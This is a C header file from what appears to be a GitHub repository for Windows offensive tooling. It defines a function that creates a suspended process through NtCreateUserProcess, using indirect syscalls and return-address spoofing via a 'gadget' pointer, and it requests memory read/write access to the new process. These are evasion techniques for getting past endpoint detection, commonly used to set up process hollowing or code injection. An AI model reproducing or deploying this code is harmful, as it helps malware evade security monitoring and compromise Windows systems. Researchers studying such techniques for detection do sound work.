-
Notifications
You must be signed in to change notification settings - Fork 52
/
ntprocessapi.h
89 lines (70 loc) · 2.58 KB
/
ntprocessapi.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
// This header file facilitates the creation of a suspended process using NtCreateUserProcess api
#pragma once
#include "functions.h"
#include "structs.h"
#include "retaddrspoof.h"
#define ZeroOut RtlSecureZeroMemory
#define PS_ATTRIBUTE_IMAGE_NAME PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)
extern PVOID Gdgt;
/// <summary>
/// Creates a suspended process using NtCreateUserProcess api by invoking an indirect syscall, (szProcessName is in windows syntax: \\??\\C:\\Windows\\hh.exe)
/// </summary>
/// <param name="szProcessName"></param>
/// <param name="hCreatedProcess"></param>
/// <param name="hCreatedThread"></param>
/// <returns></returns>
NTSTATUS NtCreateUserSuspendedProcess(const wchar_t* szProcessName, PHANDLE hCreatedProcess, PHANDLE hCreatedThread) {
UNICODE_STRING NtImagePath;
ZeroOut(&NtImagePath, sizeof(UNICODE_STRING));
RtlInitUnicodeString(&NtImagePath, szProcessName);
// Create the process parameters
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;
NTSTATUS status = (NTSTATUS)RetSpoofCall((void*)RtlCreateProcessParametersEx, 11, Gdgt,
&ProcessParameters,
&NtImagePath,
NULL,
NULL,
&NtImagePath, // CommandLine usually should be the same as ImagePath
NULL,
NULL,
NULL,
NULL,
NULL,
RTL_USER_PROCESS_PARAMETERS_NORMALIZED
);
// Initialize the PS_CREATE_INFO structure
PS_CREATE_INFO CreateInfo = { 0 };
ZeroMemory(&CreateInfo, sizeof(PS_CREATE_INFO));
CreateInfo.Size = sizeof(CreateInfo);
CreateInfo.State = PsCreateInitialState;
// Initialize the PS_ATTRIBUTE_LIST structure
size_t attributeListSize = sizeof(PS_ATTRIBUTE_LIST) + sizeof(PS_ATTRIBUTE);
PS_ATTRIBUTE_LIST AttributeList = { 0 };
ZeroMemory(&AttributeList, sizeof(AttributeList));
AttributeList.TotalLength = attributeListSize - sizeof(PS_ATTRIBUTE);
AttributeList.Attributes[0].Attribute = PS_ATTRIBUTE_IMAGE_NAME;
AttributeList.Attributes[0].Size = NtImagePath.Length;
AttributeList.Attributes[0].Value = (ULONG_PTR)NtImagePath.Buffer;
// Create the process
HANDLE hProcess = NULL,
hThread = NULL;
status = (NTSTATUS)RetSpoofCall((void*)
SysNtCreateUserProcess,
11,
Gdgt,
&hProcess,
&hThread,
PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_TERMINATE,
THREAD_SUSPEND_RESUME,
NULL,
NULL,
0, // ProcessFlags
THREAD_CREATE_FLAGS_CREATE_SUSPENDED, // ThreadFlags
ProcessParameters,
&CreateInfo,
&AttributeList
);
*hCreatedProcess = hProcess;
*hCreatedThread = hThread;
return status;
}